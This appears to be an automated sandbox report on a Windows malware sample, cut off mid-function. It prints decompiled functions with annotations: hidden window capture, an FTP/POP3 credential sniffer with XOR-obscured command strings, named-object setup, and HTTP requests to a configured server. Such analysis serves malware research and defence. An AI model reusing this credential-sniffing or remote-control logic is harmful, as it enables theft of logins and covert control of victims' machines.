    • Instruction Fuzzy Hash: 33219D32721400ABD338DF3DEC65A5533F2E38935939A443DD616C32A0DA3AEA438B4C
    Uniqueness
    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
    • Instruction ID: 141cc07d909ea3e942c3ee2bd1691bdf5ab195add67bf5742ceffabbebb77c8f
    • Instruction Fuzzy Hash: EAE0DF7B3000108BC750CE12E480943B7A2FBE8330B528EB5C81587346C938EDC38AD5
    Uniqueness
    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			/* Editor's annotation (not emitted by the decompiler): renders a window into the bitmap
    			   stored at _a4 + 0x1c through a memory DC. GetWindowInfo/IntersectRect clip the window and
    			   client rectangles to the requested RECT; depending on the flags from E00407C72 the
    			   contents are obtained with PrintWindow, WM_PRINT (0x317, PRF_ flags 0xe / 2 / 4), or by
    			   sending WM_ERASEBKGND (0x14), WM_NCPAINT (0x85) and WM_PAINT (0xf) to the target window
    			   while a TLS slot (*0x4228e4) points at the capture context. Returns 1 on success, 0 on
    			   failure. */
    			E0041CB6F(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
    				char _v9;
    				signed int _v10;
    				int _v16;
    				int _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				struct tagRECT _v48;
    				struct tagRECT _v64;
    				void* _v68;
    				signed int _v72;
    				int _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				int _v88;
    				int _v92;
    				struct HDC__* _v96;
    				struct HWND__* _v100;
    				void _v104;
    				intOrPtr _v140;
    				intOrPtr _v156;
    				struct tagWINDOWINFO _v164;
    				signed int _t128;
    				signed int _t135;
    				void* _t140;
    				void* _t146;
    				signed int _t164;
    				intOrPtr _t191;
    				long _t192;
    				intOrPtr _t195;
    				long _t196;
    				long _t210;
    				long _t211;
    				long _t212;
    				long _t213;
    				signed int _t214;
    				signed int _t215;
    				RECT* _t216;
    				struct HDC__* _t217;
    				struct HDC__* _t221;
    
    				_t214 = __edx;
    				_t216 = __eax;
    				_t128 = E00407C72(_a8) & 0x0000ffff;
    				_v16 = _t128;
    				if((_t128 & 0x00000001) == 0) {
    					if(_t128 == 0) {
    						_v16 = 2;
    						_t128 = _v16;
    					}
    					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
    						_v16 = _t128 & 0x0000fffd | 0x00000008;
    					}
    					_v24 = 0;
    					_v20 = 0;
    					_v28 = 0;
    					_v32 = 0;
    					_v164.cbSize = 0x3c;
    					if(GetWindowInfo(_a8,  &_v164) != 0) {
    						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
    						_v10 = _t215;
    						if(_t215 != 0) {
    							_t212 = _t216->top;
    							_t195 = _v156;
    							if(_t195 < _t212) {
    								_v20 = _t195 - _t212;
    							}
    							_t213 = _t216->left;
    							_t196 = _v164.rcWindow.left;
    							if(_t196 < _t213) {
    								_v24 = _t196 - _t213;
    							}
    						}
    						_t135 = _v16 & 0x00000002;
    						_v72 = _t135;
    						if(_t135 == 0) {
    							_a15 = _t215;
    						} else {
    							if((_v164.dwStyle & 0x20000000) == 0) {
    								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
    								if(_a15 != 0) {
    									_t210 = _t216->top;
    									_t191 = _v140;
    									if(_t191 < _t210) {
    										_v32 = _t191 - _t210;
    									}
    									_t211 = _t216->left;
    									_t192 = _v164.rcClient.left;
    									if(_t192 < _t211) {
    										_v28 = _t192 - _t211;
    									}
    								}
    							} else {
    								_a15 = 0;
    							}
    						}
    						if(_v10 != 0 || _a15 != 0) {
    							_t217 = GetDC(0);
    							if(_t217 == 0) {
    								goto L8;
    							}
    							_t221 = CreateCompatibleDC(_t217);
    							ReleaseDC(0, _t217);
    							if(_t221 == 0) {
    								goto L8;
    							}
    							_t218 = _a4;
    							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
    							_v68 = _t140;
    							if(_t140 != 0) {
    								_v9 = 1;
    								if(_v72 == 0) {
    									if((_v16 & 0x00000004) == 0) {
    										if((_v16 & 0x00000008) == 0) {
    											L56:
    											SelectObject(_t221, _v68);
    											DeleteDC(_t221);
    											return _v9;
    										}
    										if(_v24 != 0 || _v20 != 0) {
    											SetViewportOrgEx(_t221, _v24, _v20, 0);
    										}
    										_t146 = E0041CA8D(_t218,  &_v64, 0);
    										__imp__PrintWindow(_a8, _t221, 0);
    										if(_t146 != 0) {
    											L55:
    											E0041CA8D(_t218,  &_v64, 1);
    										} else {
    											_v9 = 0;
    										}
    										goto L56;
    									}
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E0041CA8D(_t218,  &_v64, 0);
    									DefWindowProcW(_a8, 0x317, _t221, 0xe);
    									goto L55;
    								}
    								_v100 = _a8;
    								_v96 = _t221;
    								_v84 = _v48.right - _v48.left;
    								_v76 = 1;
    								_v80 = _v48.bottom - _v48.top;
    								_v92 = 0;
    								_v88 = 0;
    								TlsSetValue( *0x4228e4,  &_v104);
    								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
    									_v16 = SaveDC(_t221);
    									if(_v24 != 0 || _v20 != 0) {
    										SetViewportOrgEx(_t221, _v24, _v20, 0);
    									}
    									E0041CA8D(_a4,  &_v64, 0);
    									_v104 = 0;
    									SendMessageW(_a8, 0x85, 1, 0);
    									if(_v104 == 0) {
    										DefWindowProcW(_a8, 0x317, _t221, 2);
    									}
    									E0041CA8D(_a4,  &_v64, 1);
    									RestoreDC(_t221, _v16);
    								}
    								if(_a15 != 1) {
    									L49:
    									TlsSetValue( *0x4228e4, 0);
    									goto L56;
    								} else {
    									if(_v28 != 0) {
    										L41:
    										_a15 = 1;
    										L42:
    										_v16 = SaveDC(_t221);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										E0041CA8D(_a4,  &_v48, 0);
    										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
    										asm("sbb eax, eax");
    										_v76 =  ~_t164 + 1;
    										RestoreDC(_t221, _v16);
    										if(_a15 != 0) {
    											SetViewportOrgEx(_t221, _v28, _v32, 0);
    										}
    										_v104 = 0;
    										SendMessageW(_a8, 0xf, 0, 0);
    										if(_v104 == 0) {
    											DefWindowProcW(_a8, 0x317, _t221, 4);
    										}
    										E0041CA8D(_a4,  &_v48, 1);
    										goto L49;
    									}
    									_a15 = 0;
    									if(_v32 == 0) {
    										goto L42;
    									}
    									goto L41;
    								}
    							}
    							DeleteDC(_t221);
    							goto L8;
    						} else {
    							goto L1;
    						}
    					}
    					L8:
    					return 0;
    				}
    				L1:
    				return 1;
    			}

    APIs
    • Part of subcall function 00407C72: GetClassNameW.USER32 ref: 00407C8D
    • GetWindowInfo.USER32 ref: 0041CBDB
    • SelectObject.GDI32(00000000,?), ref: 0041CEAA
    • DeleteDC.GDI32(00000000), ref: 0041CEB1
    • SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0041CED9
    • PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 0041CEEF
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
    • String ID: <
    • API String ID: 3458064076-4251816714
    • Opcode ID: ecc3a0e2cb270dd507e3a537c5799a3012f381c5f2d63433b0fd11722b1dd01f
    • Instruction ID: 3022ab70d4d4abe3fc86d58c7efcd7222dedaacc640718fcfd5d917ac2666832
    • Instruction Fuzzy Hash: 92C16D71D40249AFDF11DFA4DD84EEEBFB9AF05304F04802AF945E6260D7388A84DB99
    Uniqueness
    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			/* Editor's annotation (not emitted by the decompiler; the constant decoding is the editor's):
    			   classifies a captured socket payload (__ecx, length __eax, socket _a4) as FTP or POP3
    			   credential traffic. The first dword is compared after XOR with 0x02030309: 0x5046505c and
    			   0x51504259 decode to "USER" and "PASS", whose argument is stored per socket in the list
    			   guarded by the critical section at 0x422a70; "CWD"/"PWD" (0x43/0x50, 0x57, 0x44), "TYPE"
    			   (0x47535a5d), "FEAT" (0x5642464f) and "PASV" (0x54504259) select tag 0x64, "STAT"
    			   (0x5642575a) and "LIST" (0x56504a45) select tag 0x65, after which the peer address is
    			   fetched via ws2_32 ordinal 5 (getpeername) and the record is reported. */
    			E00408976(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
    				char _v536;
    				char _v652;
    				char _v664;
    				char _v696;
    				char _v700;
    				char _v701;
    				char _v708;
    				void* __esi;
    				char* _t35;
    				void* _t40;
    				char* _t43;
    				intOrPtr _t44;
    				void* _t47;
    				void* _t54;
    				void* _t56;
    				intOrPtr _t57;
    				signed int _t58;
    				signed int _t60;
    				void* _t61;
    				signed int* _t71;
    				intOrPtr _t73;
    				signed int _t75;
    				signed char _t76;
    				intOrPtr _t79;
    				signed int _t80;
    				intOrPtr _t83;
    				signed int* _t84;
    				intOrPtr _t85;
    				void* _t87;
    				char* _t92;
    				void* _t93;
    				intOrPtr* _t94;
    
    				_t80 = __edx;
    				_t87 = __eax;
    				_t71 = __ecx;
    				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
    					L51:
    					_t35 = 0;
    					__eflags = 0;
    				} else {
    					if(__eax <= 6) {
    						L24:
    						__eflags = _t87 - 1;
    						if(_t87 <= 1) {
    							goto L51;
    						} else {
    							EnterCriticalSection(0x422a70);
    							_t83 = E0040886E(_a4);
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags =  *((intOrPtr*)(_t83 + 4));
    								if( *((intOrPtr*)(_t83 + 4)) == 0) {
    									L48:
    									_push(0);
    									goto L49;
    								} else {
    									__eflags =  *((intOrPtr*)(_t83 + 8));
    									if( *((intOrPtr*)(_t83 + 8)) == 0) {
    										goto L48;
    									} else {
    										__eflags = _t87 - 3;
    										if(_t87 < 3) {
    											L33:
    											__eflags = _t87 - 4;
    											if(_t87 >= 4) {
    												_t75 =  *_t71 ^ 0x02030309;
    												__eflags = _t75 - 0x47535a5d;
    												if(_t75 == 0x47535a5d) {
    													goto L37;
    												} else {
    													__eflags = _t75 - 0x5642464f;
    													if(_t75 == 0x5642464f) {
    														goto L37;
    													} else {
    														__eflags = _t75 - 0x54504259;
    														if(_t75 != 0x54504259) {
    															__eflags = _t75 - 0x5642575a;
    															if(_t75 == 0x5642575a) {
    																L40:
    																_t76 = 0x65;
    																_push(0x15);
    																goto L41;
    															} else {
    																__eflags = _t75 - 0x56504a45;
    																if(_t75 == 0x56504a45) {
    																	goto L40;
    																}
    															}
    														} else {
    															goto L37;
    														}
    													}
    												}
    											}
    										} else {
    											_t58 =  *_t71;
    											__eflags = _t58 - 0x43;
    											if(_t58 == 0x43) {
    												L31:
    												__eflags = _t71[0] - 0x57;
    												if(_t71[0] != 0x57) {
    													goto L33;
    												} else {
    													__eflags = _t71[0] - 0x44;
    													if(_t71[0] == 0x44) {
    														L37:
    														_t76 = 0x64;
    														_push(0x14);
    														L41:
    														_pop(_t40);
    														E0040FA33(_t40,  &_v696);
    														_t43 =  &_v652;
    														_v700 = 0x80;
    														__imp__#5(_a4, _t43,  &_v700);
    														__eflags = _t43;
    														if(_t43 == 0) {
    															_t78 =  &_v664;
    															_t44 = E00419852( &_v664);
    															__eflags = _t44;
    															if(_t44 == 0) {
    																__eflags = _t76 - 0x65;
    																if(_t76 == 0x65) {
    																	L46:
    																	E00419809( &_v664, _t78,  &_v536);
    																	_t47 = 0x13;
    																	E0040FA33(_t47,  &_v696);
    																	_push( &_v536);
    																	_push( *((intOrPtr*)(_t83 + 8)));
    																	_push( *((intOrPtr*)(_t83 + 4)));
    																	E0040592A(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
    																} else {
    																	__eflags = _t76 - 0x64;
    																	if(_t76 == 0x64) {
    																		_t92 =  &_v696;
    																		_t54 = 0x16;
    																		E0040FA33(_t54, _t92);
    																		_push( *((intOrPtr*)(_t83 + 4)));
    																		_t80 = _t80 | 0xffffffff;
    																		_t56 = 9;
    																		_t78 = _t92;
    																		_t57 = E00416FB8(_t56, _t92, _t80);
    																		__eflags = _t57;
    																		if(_t57 != 0) {
    																			goto L46;
    																		}
    																	}
    																}
    															}
    														}
    														_push(0);
    														L49:
    														E0040890D(_t83);
    													} else {
    														goto L33;
    													}
    												}
    											} else {
    												__eflags = _t58 - 0x50;
    												if(_t58 != 0x50) {
    													goto L33;
    												} else {
    													goto L31;
    												}
    											}
    										}
    									}
    								}
    							}
    							_t73 = 0;
    							goto L23;
    						}
    					} else {
    						_t60 =  *__ecx ^ 0x02030309;
    						if(_t60 == 0x5046505c || _t60 == 0x51504259) {
    							if(_t71[1] != 0x20) {
    								goto L24;
    							} else {
    								_t61 = 0;
    								_t93 = _t87 + 0xfffffffb;
    								_t84 =  &(_t71[1]);
    								if(_t93 == 0) {
    									goto L51;
    								} else {
    									while(1) {
    										_t79 =  *((intOrPtr*)(_t61 + _t84));
    										if(_t79 == 0xd || _t79 == 0xa) {
    											break;
    										}
    										if(_t79 < 0x20) {
    											goto L51;
    										} else {
    											_t61 = _t61 + 1;
    											if(_t61 < _t93) {
    												continue;
    											} else {
    												break;
    											}
    										}
    										goto L52;
    									}
    									if(_t61 == 0 || _t61 == _t93) {
    										goto L51;
    									} else {
    										_t85 = E004165E8(_t61, 0xfde9, _t84);
    										if(_t85 == 0) {
    											goto L51;
    										} else {
    											_v701 = 0;
    											EnterCriticalSection(0x422a70);
    											_t94 = E0040886E(_a4);
    											if(_t94 != 0) {
    												L18:
    												__eflags =  *_t71 - 0x55;
    												_v701 = 1;
    												if( *_t71 != 0x55) {
    													E004163A8( *((intOrPtr*)(_t94 + 8)));
    													 *((intOrPtr*)(_t94 + 8)) = _t85;
    												} else {
    													E0040890D(_t94, 1);
    													 *((intOrPtr*)(_t94 + 4)) = _t85;
    												}
    												 *_t94 = _a4;
    											} else {
    												_t94 = E004088A7(_a4);
    												if(_t94 != 0) {
    													goto L18;
    												} else {
    													E004163A8(_t85);
    												}
    											}
    											_t73 = _v701;
    											L23:
    											LeaveCriticalSection(0x422a70);
    											_t35 = _t73;
    										}
    									}
    								}
    							}
    						} else {
    							goto L24;
    						}
    					}
    				}
    				L52:
    				return _t35;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00422A70,0000FDE9,?), ref: 00408A2B
    • LeaveCriticalSection.KERNEL32(00422A70,?,000000FF), ref: 00408A86
    • EnterCriticalSection.KERNEL32(00422A70), ref: 00408AA1
    • getpeername.WS2_32 ref: 00408B4E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSection$Enter$Leavegetpeername
    • String ID: $D$EJPV$OFBV$U$W$YBPQ$YBPT$ZWBV$\PFP$]ZSG
    • API String ID: 1099368488-3470239646
    • Opcode ID: 599b3a7933275f77041fb80adb324b488d4c1f25bb899bd5c2395e40c2722bb1
    • Instruction ID: c55d6541f01d3a8453908545f3494c37656a575ac9efad2927a9ec29ab361fca
    • Opcode Fuzzy Hash: 599b3a7933275f77041fb80adb324b488d4c1f25bb899bd5c2395e40c2722bb1
    • Instruction Fuzzy Hash: EB513471A04305AEDF30AA248E85BAB77A05B41714F14453FF9D4BB2D1DE3DE8819B4E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407CD9(void* __ecx, void* __edx, void** __esi, struct HDC__* _a4) {
    				char _v9;
    				struct HDC__* _v16;
    				char _v20;
    				short _v128;
    				void* _v138;
    				char _v616;
    				char _v1039;
    				char _v1408;
    				void* _t60;
    				long _t62;
    				void* _t66;
    				void* _t71;
    				void* _t75;
    				void* _t79;
    				void* _t80;
    				struct HDC__* _t82;
    				int _t85;
    				void* _t87;
    				signed char _t90;
    				void* _t92;
    				void* _t107;
    				struct HDC__* _t108;
    				void* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t120;
    				void** _t124;
    
    				_t124 = __esi;
    				_t120 = __edx;
    				E0041645B(_t60, __esi, 0, 0x18c);
    				_t62 = TlsAlloc();
    				__esi[1] = _t62;
    				if(_t62 != 0xffffffff) {
    					E0040ED80(0x84889911,  &_v128, 0);
    					_t66 = RegisterWindowMessageW( &_v128);
    					__esi[2] = _t66;
    					__eflags = _t66;
    					if(_t66 == 0) {
    						goto L1;
    					}
    					E0040ED80(0x84889912,  &_v128, 1);
    					_t71 = CreateEventW(0x422bd0, 1, 0,  &_v128);
    					__esi[3] = _t71;
    					__eflags = _t71;
    					if(_t71 == 0) {
    						goto L1;
    					}
    					E0040ED80(0x18782822,  &_v128, 1);
    					_t75 = CreateMutexW(0x422bd0, 0,  &_v128);
    					__esi[5] = _t75;
    					__eflags = _t75;
    					if(_t75 == 0) {
    						goto L1;
    					}
    					E0040ED80(0x9878a222,  &_v128, 1);
    					_t79 = CreateFileMappingW(0, 0x422bd0, 4, 0, 0x3d09128,  &_v128);
    					 *__esi = _t79;
    					__eflags = _t79;
    					if(_t79 == 0) {
    						goto L1;
    					}
    					_t80 = MapViewOfFile(_t79, 2, 0, 0, 0);
    					__eflags = _t80;
    					if(_t80 == 0) {
    						goto L1;
    					}
    					__esi[4] = _t80;
    					__esi[6] = _t80 + 0x128;
    					_v9 = 0;
    					_t82 = GetDC(0);
    					_v16 = _t82;
    					__eflags = _t82;
    					if(_t82 == 0) {
    						L22:
    						return _v9;
    					}
    					__esi[9] = 0;
    					__esi[0xa] = 0;
    					__esi[0xb] = GetDeviceCaps(_t82, 8);
    					_t85 = GetDeviceCaps(_v16, 0xa);
    					_t21 =  &(_t124[0xb]); // 0x0
    					_t118 =  *_t21;
    					__esi[0xc] = _t85;
    					__eflags = CreateCompatibleBitmap(_v16,  *_t21, _t85);
    					if(__eflags == 0) {
    						_t87 = 0;
    						__eflags = 0;
    					} else {
    						_t24 =  &(_t124[8]); // 0x422900
    						_t87 = E0041C948(_t118, _t120, __eflags, _v16,  &_v20, _t24, 0, 0, _t86);
    					}
    					_t124[7] = _t87;
    					ReleaseDC(0, _v16);
    					__eflags = _t124[7];
    					if(_t124[7] != 0) {
    						_t119 = _v20;
    						_t90 =  *(_v20 + 0xe) >> 3;
    						_t124[0xe] = _t90;
    						_t33 =  &(_t124[0xb]); // 0x0
    						_t92 = (_t90 & 0x000000ff) *  *_t33;
    						_t124[0xd] = _t92;
    						__eflags = _t92 & 0x00000003;
    						if((_t92 & 0x00000003) != 0) {
    							_t92 = (_t92 & 0xfffffffc) + 4;
    							__eflags = _t92;
    						}
    						_t124[0xd] = _t92;
    						E004163A8(_t119);
    						__eflags = _a4 - 1;
    						_v9 = 1;
    						if(_a4 != 1) {
    							goto L22;
    						}
    						_v9 = 0;
    						E0040F05A( &_v1408);
    						E0040F087(_t119,  &_v616);
    						_t43 =  &(_t124[0xf]); // 0x42291c
    						E004163E4(_t43, 0x422e10, 0x10);
    						_t124[0x13] = _v138;
    						_t47 =  &(_t124[0x14]); // 0x422930
    						E004163E4(_t47,  &_v1039, 0x102);
    						E0040ED80(0x1898b122,  &_v128, 1);
    						_t107 = CreateMutexW(0x422bd0, 0,  &_v128);
    						_t124[0x58] = _t107;
    						__eflags = _t107;
    						if(_t107 == 0) {
    							goto L1;
    						}
    						_t108 = GetDC(0);
    						_a4 = _t108;
    						__eflags = _t108;
    						if(_t108 != 0) {
    							_t109 = CreateCompatibleDC(_t108);
    							_t124[0x55] = _t109;
    							__eflags = _t109;
    							if(_t109 != 0) {
    								_t111 = CreateCompatibleBitmap(_a4, 1, 1);
    								_t124[0x57] = _t111;
    								__eflags = _t111;
    								if(_t111 != 0) {
    									_t55 =  &(_t124[0x55]); // 0x0
    									_t112 = SelectObject( *_t55, _t111);
    									_t124[0x56] = _t112;
    									__eflags = _t112;
    									if(_t112 != 0) {
    										_v9 = 1;
    									}
    								}
    							}
    							ReleaseDC(0, _a4);
    						}
    					}
    					goto L22;
    				}
    				L1:
    				return 0;
    			}

    APIs
    • TlsAlloc.KERNEL32(004228E0,00000000,0000018C,00000000,00000000), ref: 00407CF2
    • RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 00407D1A
    • CreateEventW.KERNEL32(00422BD0,00000001,00000000,?,84889912,?,00000001), ref: 00407D44
    • CreateMutexW.KERNEL32(00422BD0,00000000,?,18782822,?,00000001), ref: 00407D67
    • CreateFileMappingW.KERNEL32(00000000,00422BD0,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 00407D92
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00407DA8
    • GetDC.USER32(00000000), ref: 00407DC5
    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00407DE5
    • GetDeviceCaps.GDI32(?,0000000A), ref: 00407DEF
    • CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 00407E02
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Create$CapsDeviceFile$AllocBitmapCompatibleEventMappingMessageMutexRegisterViewWindow
    • String ID:
    • API String ID: 3765073151-0
    • Opcode ID: f6815b2bc375ad3db812a6cee099843ae513234d81b6bd9e75353da428c22d98
    • Instruction ID: 471e7765bfdfc757ba16c1d8bfa312713de6099d43fa0998822160b3af984389
    • Opcode Fuzzy Hash: f6815b2bc375ad3db812a6cee099843ae513234d81b6bd9e75353da428c22d98
    • Instruction Fuzzy Hash: 0B7130B1900649AFDB209FB1CD85AAFB7ACEF08344F10483EF951E2691D279A9448F65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041534F(intOrPtr* _a4) {
    				char _v532;
    				void* _v536;
    				short _v540;
    				char* _v552;
    				void* _v568;
    				char _v570;
    				char _v572;
    				char _v576;
    				char* _v580;
    				void* _v592;
    				char _v596;
    				char _v600;
    				void* _v620;
    				void* _v624;
    				void* _v628;
    				char* _v632;
    				long _v648;
    				void _v652;
    				intOrPtr _v656;
    				char _v668;
    				intOrPtr _v672;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t53;
    				void* _t56;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    				void* _t94;
    				void* _t99;
    				char* _t101;
    				intOrPtr* _t109;
    				void* _t113;
    				intOrPtr* _t114;
    				signed int _t120;
    				void* _t122;
    
    				_t122 = (_t120 & 0xfffffff8) - 0x224;
    				_t109 = _a4;
    				if(E0041AE08( &_v532,  *((intOrPtr*)(_t109 + 4))) == 0) {
    					L25:
    					return 0;
    				}
    				_t53 = InternetOpenA( *0x422e0c, 0, 0, 0, 0);
    				_v536 = _t53;
    				if(_t53 == 0) {
    					L24:
    					E004163A8(_v552);
    					E004163A8(_v552);
    					goto L25;
    				}
    				_t56 = InternetConnectA(_t53, _v552, _v540, 0, 0, 3, 0, 0);
    				_v592 = _t56;
    				if(_t56 == 0) {
    					L23:
    					InternetCloseHandle(_v568);
    					goto L24;
    				}
    				_t58 =  *_t109;
    				_t101 = "POST";
    				if( *((char*)(_t58 + 0x18)) != 1) {
    					_t101 = "GET";
    				}
    				_t99 = HttpOpenRequestA(_v592, _t101, _v580, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v570 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
    				_v620 = _t99;
    				if(_t99 == 0) {
    					L22:
    					InternetCloseHandle(_v624);
    					goto L23;
    				} else {
    					E0040F087(_t101,  &_v576);
    					_t63 = 0xe;
    					E0040F9FD(_t63,  &_v600);
    					_t66 =  *_a4;
    					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
    						_t94 = E0041716C( &_v632,  &_v600,  *((intOrPtr*)(_t66 + 0x1c)));
    						_t122 = _t122 + 0xc;
    						if(_t94 > 0) {
    							HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
    							E004163A8(_v648);
    						}
    					}
    					_t67 = 0xf;
    					E0040F9FD(_t67,  &_v596);
    					_v628 = E00416EF7( &_v572);
    					_t113 = E00416378(2 + _t69 * 6);
    					if(_t113 == 0) {
    						_t113 = 0;
    					} else {
    						E0041B133(_t113,  &_v572, _v628);
    						_t99 = _v628;
    					}
    					if(_t113 != 0 && E0041716C( &_v632,  &_v596, _t113) > 0) {
    						HttpAddRequestHeadersA(_t99, _v632, 0xffffffff, 0xa0000000);
    						E004163A8(_v648);
    					}
    					E004163A8(_t113);
    					_t114 = _a4;
    					if(HttpSendRequestA(_t99, 0, 0,  *( *_t114 + 0x24),  *( *_t114 + 0x28)) != 1) {
    						L21:
    						InternetCloseHandle(_t99);
    						goto L22;
    					} else {
    						_v648 = 4;
    						_v652 = 0;
    						if(HttpQueryInfoA(_t99, 0x20000013,  &_v652,  &_v648, 0) != 1 || _v672 != 0xc8) {
    							goto L21;
    						} else {
    							if(E004184DE( &_v668, _t99) != 0) {
    								E004163A8(_t80);
    							}
    							E004163A8(_v656);
    							E004163A8(_v656);
    							 *((intOrPtr*)(_t114 + 8)) = _v668;
    							goto L25;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 0041AE08: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041AE37
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00415381
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004153A2
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 004153F1
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00415448
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004154C0
    • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 004154E3
    • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 0041550B
    • InternetCloseHandle.WININET(00000000), ref: 00415550
    • InternetCloseHandle.WININET(?), ref: 0041555A
      • Part of subcall function 004184DE: InternetQueryOptionA.WININET(-004228D8,00000022,00000000,?), ref: 004184F2
      • Part of subcall function 004184DE: GetLastError.KERNEL32 ref: 004184FC
      • Part of subcall function 004184DE: InternetQueryOptionA.WININET(00000022,00000022,00000000,?), ref: 0041851C
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    • InternetCloseHandle.WININET(?), ref: 00415564
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 1023423486-2753618334
    • Opcode ID: 0bdd89c34fe9eef0bca58da9f764c299d5242de756ca936541a0e1e04515c5c5
    • Instruction ID: d2a8cd2bcfd3fb7620bc9c77f006be8acb69721057e53ef99e69e82a05f685d2
    • Opcode Fuzzy Hash: 0bdd89c34fe9eef0bca58da9f764c299d5242de756ca936541a0e1e04515c5c5
    • Instruction Fuzzy Hash: 0751BA72004301BBCB11AF61CD49EDFBFAAAFC8354F00092AF545A2271D738D984DB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00408210(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
    				struct tagRECT _v20;
    				signed int _v24;
    				signed int _v28;
    				signed short _t37;
    				int _t46;
    				BYTE* _t47;
    				signed short _t51;
    				int _t63;
    				int _t64;
    				unsigned int _t65;
    				struct HMENU__* _t70;
    				struct HMENU__* _t74;
    				void* _t78;
    
    				_t65 = __ecx;
    				_t37 = _a8;
    				_t78 = _t37 - 0xfffffffd;
    				if(_t78 == 0) {
    					SetKeyboardState( *0x4228f0);
    					L23:
    					SetEvent( *0x4228ec);
    					return 0;
    				}
    				if(_t78 <= 0 || _t37 > 0xffffffff) {
    					_v20.top = _t37 >> 0x10;
    					_v20.right = _t65 & 0x0000ffff;
    					_v20.left = _t37 & 0x0000ffff;
    					_v20.bottom = _t65 >> 0x10;
